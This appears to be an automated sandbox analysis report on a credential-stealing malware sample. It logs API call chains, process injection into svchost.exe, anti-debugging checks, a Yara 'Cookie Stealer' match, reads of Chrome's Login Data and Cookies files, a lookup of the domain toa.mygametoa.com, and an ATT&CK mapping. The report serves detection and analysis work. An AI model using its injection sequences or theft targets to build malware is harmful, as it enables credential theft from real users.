Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C0478 FindFirstFileExA,17_2_00000204F33C0478
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,17_2_00000204F3384AE3
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,17_2_00000204F33849FF
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,17_2_00000204F3387A20
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00000204F33857B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,17_2_00000204F3385E30
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,17_2_00000204F339AE60
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,13_2_04EC5C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDEFAF mov eax, dword ptr fs:[00000030h]13_2_04EDEFAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04D772D8 mov eax, dword ptr fs:[00000030h]13_2_04D772D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED669F IsDebuggerPresent,OutputDebugStringW,13_2_04ED669F
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB804 GetLastError,IsDebuggerPresent,OutputDebugStringW,14_2_0000024B7D0FB804
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBB540 UnmapViewOfFile,CreateFileMappingW,MapViewOfFile,GetProcessHeap,HeapFree,13_2_04EBB540
Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC1D00 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,13_2_04EC1D00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDE94C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_04EDE94C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED5AE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_04ED5AE6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED62AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_04ED62AE
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D103EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000024B7D103EBC
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FA9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0000024B7D0FA9E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000024B7D0FB324
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789B324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E1789B324
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789A9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000012E1789A9E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E178A3EBC
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1980296C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E1980296C
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805788 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E19805788
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB3D8 SetUnhandledExceptionFilter,16_2_0000012E198EB3D8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D3648 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E198D3648
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D0824 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000012E198D0824
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000204F33AB324
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000204F33B3EBC

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\svchost.exeDomain query: toa.mygametoa.com
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B7C9A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 204F32C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23341FB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D91A370000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2F2C5B40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 222CAA60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 286215B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DC519A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2216B180000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2743A260000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1111A940000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F12130000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE5BFA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C22B30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 202B2180000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AFBA0B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25C96320000 protect: page execute and read and writeJump to behavior
Contains functionality to inject code into remote processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,13_2_04EC98E0
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C9A0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F32C0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FB0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 1A370000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: C5B40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: CAA60000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 215B0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 519A0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 6B180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 3A260000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 1A940000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 12130000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 5BFA0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 22B30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: B2180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: BA0B0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 96320000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 3F100000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 8E740000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: CCE40000Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 24B7C9A0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 204F32C0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23341FB0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1D91A370000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2F2C5B40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 222CAA60000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 286215B0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC519A0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2216B180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2743A260000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1111A940000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 22F12130000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE5BFA0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 21C22B30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 202B2180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFBA0B0000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25C96320000Jump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\System32\svchost.exeThread register set: target process: 6944Jump to behavior
Contains functionality to inject threads in other processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EBC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,14_2_0000024B7D0EBC10
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,16_2_0000012E1788BC10
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,17_2_00000204F339BC10
Sets debug register (to hijack the execution of another thread)Show sources
Source: C:\Windows\System32\svchost.exeThread register set: 6944 4D000Jump to behavior
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,FindCloseChangeNotification,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService14_2_0000024B7D0EC6B0
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService16_2_0000012E1788C6B0
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService17_2_00000204F339C6B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,13_2_04EC2050
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkServiceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006A4AF0 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,11_2_006A4AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,13_2_04EC2050
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C6A5C AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,11_2_005C6A5C
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C78B8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,11_2_005C78B8
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progman
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,10_2_0040B044
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_0041E034
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_0041E080
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_004AF218
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0040A4CC
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_0040E7F0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0040DC78
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetLocaleInfoW,11_2_0060FD58
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00405AE0 cpuid 10_2_00405AE0
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041C3D8 GetLocalTime,10_2_0041C3D8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC74 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,16_2_0000012E198DEC74
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_00625580 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,11_2_00625580
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,10_2_004B5114
Source: svchost.exe, 00000026.00000000.409083058.0000025C96554000.00000004.00000001.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information:

barindex
Yara detected Cookie StealerShow sources
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmpJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmpJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Contains functionality to steal Chrome passwords or cookiesShow sources
Source: C:\Windows\System32\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0000012E19821D50
Source: C:\Windows\System32\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0000012E19821D97

Remote Access Functionality:

barindex
Yara detected Cookie StealerShow sources
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECD7B0 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,13_2_04ECD7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED2030 socket,bind,closesocket,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,13_2_04ED2030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED39E0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,13_2_04ED39E0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,14_2_0000024B7D0F8000
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,14_2_0000024B7D0F6260
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F0B90 htons,bind,14_2_0000024B7D0F0B90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17896260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,16_2_0000012E17896260
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17898000 WSAGetLastError,socket,htons,bind,WSAGetLastError,16_2_0000012E17898000
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17890B90 htons,bind,16_2_0000012E17890B90
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0B90 htons,bind,17_2_00000204F33A0B90
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,17_2_00000204F33A6260
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,17_2_00000204F33A8000

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping2System Time Discovery2Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
